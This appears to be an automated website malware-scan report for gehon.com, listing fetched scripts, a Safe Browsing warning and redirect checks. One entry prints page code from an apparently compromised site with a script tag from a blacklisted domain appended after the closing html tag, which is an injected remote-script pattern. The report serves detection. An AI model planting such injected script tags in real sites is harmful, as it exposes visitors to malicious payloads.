Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=gehon.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.gehon.com/ | 200 OK Content-Length: 9131 Content-Type: text/html | clean |
http://www.gehon.com/media/jui/js/jquery.min.js | 200 OK Content-Length: 96381 Content-Type: application/javascript | clean |
http://www.gehon.com/media/jui/js/jquery-noconflict.js | 200 OK Content-Length: 21 Content-Type: application/javascript | clean |
http://www.gehon.com/media/jui/js/jquery-migrate.min.js | 200 OK Content-Length: 7199 Content-Type: application/javascript | clean |
http://www.gehon.com/media/system/js/caption.js | 200 OK Content-Length: 501 Content-Type: application/javascript | clean |
http://www.gehon.com/media/jui/js/bootstrap.min.js | 200 OK Content-Length: 29156 Content-Type: application/javascript | clean |
http://www.gehon.com/templates/protostar/js/template.js | 200 OK Content-Length: 1340 Content-Type: application/javascript | clean |
http://xn--y8j8ksd4c109t.net/bqvzhxgd.php?id=2028300 | HTTP/1.1 302 Found Connection: close Date: Tue, 23 Dec 2014 17:21:04 GMT Location: http://localhost/ Server: Apache/2.2.23 (Unix) mod_ssl/2.2.23 OpenSSL/1.0.1j Content-Type: text/html X-Powered-By: PHP/5.5.18 | clean |
http://localhost/ | 200 OK Content-Length: 3883 Content-Type: text/html | clean |
http://s7.addthis.com/js/250/addthis_widget.js | 200 OK Content-Length: 10550 Content-Type: text/javascript | clean |
http://xn--y8j8ksd4c109t.net/terms.html | 404 Not Found Content-Length: 12099 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.resuligci.nl ...[4299 bytes skipped]... query.js?ver=1.11.1'></script> <script type='text/javascript' src='http://xn--y8j8ksd4c109t.net/wp/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1'></script> <script type='text/javascript' src='http://xn--y8j8ksd4c109t.net/wp/wp-content/themes/biz-vektor/js/biz-vektor-min.js?ver=20140820' defer='defer'></script> </body> </html><script type="text/javascript" src="http://www.resuligci.nl/dxjry9nb.php?id=4494127"></script> | ||
http://xn--y8j8ksd4c109t.net/wp/wp-includes/js/jquery/jquery.js?ver=1.11.1 | 200 OK Content-Length: 95807 Content-Type: application/javascript | clean |
http://xn--y8j8ksd4c109t.net/wp/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://xn--y8j8ksd4c109t.net/wp/wp-content/themes/biz-vektor/js/biz-vektor-min.js?ver=20140820 | 200 OK Content-Length: 22901 Content-Type: application/javascript | clean |
http://www.resuligci.nl/dxjry9nb.php?id=4494127 | 200 OK Content-Length: 11289 Content-Type: text/html | clean |
https://p3.zdassets.com/hc/assets/application-155203b7144128c2047da6377a6f613e.js | 200 OK Content-Length: 99792 Content-Type: application/x-javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: gehon.com
Result:
GET / HTTP/1.1
Host: gehon.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: gehon.com
Referer: http://www.google.com/search?q=gehon.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: gehon.com
Referer: http://www.google.com/search?q=gehon.com
Result:
The result is similar to the first query. There are no suspicious redirects found.